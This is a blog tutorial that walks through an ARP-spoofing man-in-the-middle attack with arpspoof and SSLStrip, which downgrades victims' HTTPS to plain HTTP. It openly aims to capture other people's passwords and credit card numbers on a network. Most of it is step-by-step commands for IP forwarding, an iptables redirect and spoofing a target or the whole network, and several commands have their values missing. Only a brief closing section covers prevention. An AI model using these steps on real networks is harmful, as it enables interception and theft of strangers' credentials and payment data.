How to EASILY Steal Encrypted Passwords and Credit Card Numbers with SSLStrip

How does this work?

First, arpspoof tricks the router into believing that we are the target, and the target into believing that we are the router. This lets us receive all the traffic from the target that is meant to go to the router. From there, we can modify any of the traffic that we receive. Once we receive traffic, we send all traffic except traffic meant for port 80 (HTTP traffic) to SSL Strip. SSL Strip will then watch for HTTPS links and redirects, and will map those links to either similar HTTP links or homograph-similar HTTPS links. Therefore, all the traffic is now unencrypted and sent in plain text, and we can easily see passwords and other sensitive data submitted over the network.

 

Instructions:

1. First off, you need to make sure you have Python and Twisted Web installed. You will also need to have the dsniff suite installed.

sudo apt-get install python

sudo apt-get install python-twisted

sudo apt-get install dsniff

2. Once those dependencies are installed, you have to make sure traffic forwarding is enabled.

echo "1" > /proc/sys/net/ipv4/ip_forward

3. Now you have to forward all traffic except port 80 to a listening port (for example, where it says , you can type “1000” without quotes).

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

4. Download SSL Strip from Moxie Marlinspike’s (the awesome guy who created SSL Strip) website. Once it’s downloaded, you can install it by typing sudo python setup.py install into your CLI (Command Line Interface). Make sure you are in the correct directory.

cd /Whatever/Directory/SSLStrip/is/In

sudo python setup.py install

5. Lastly, you need to trick everyone (or a single target/computer) into believing that the router is your computer. (Where put your wireless card, where put the target's IP, where gatewayIP is put the gateway's IP, usually 192.168.1.1 or 192.168.0.1.) If you want to target the entire network, use the 3rd command.

arpspoof -i -t

e.g. “arpspoof -i wlan0 -t 192.168.1.199 192.168.1.1”

arpspoof -i

Starting SSLStrip “sslstrip -l <listenPort>” without quotes

Congratulations, you have successfully routed every packet through your computer and are able to capture people’s passwords, credit cards, and other sensitive information. Always remember though:

With great power, comes great responsibility

How to Prevent this sort of attack?

There are a couple of options. The easiest is to use a VPN. This will make it impossible for someone to follow these instructions and get your information. If you don’t want to do that, you can also use HTTPS Everywhere, which will force everything to go through HTTPS and will not let it go through HTTP. This option also works, but if you can, use a VPN.

 

Thanks for reading and if you have any questions or tips (or just want to say thanks), let me know in the comments!

About Michael David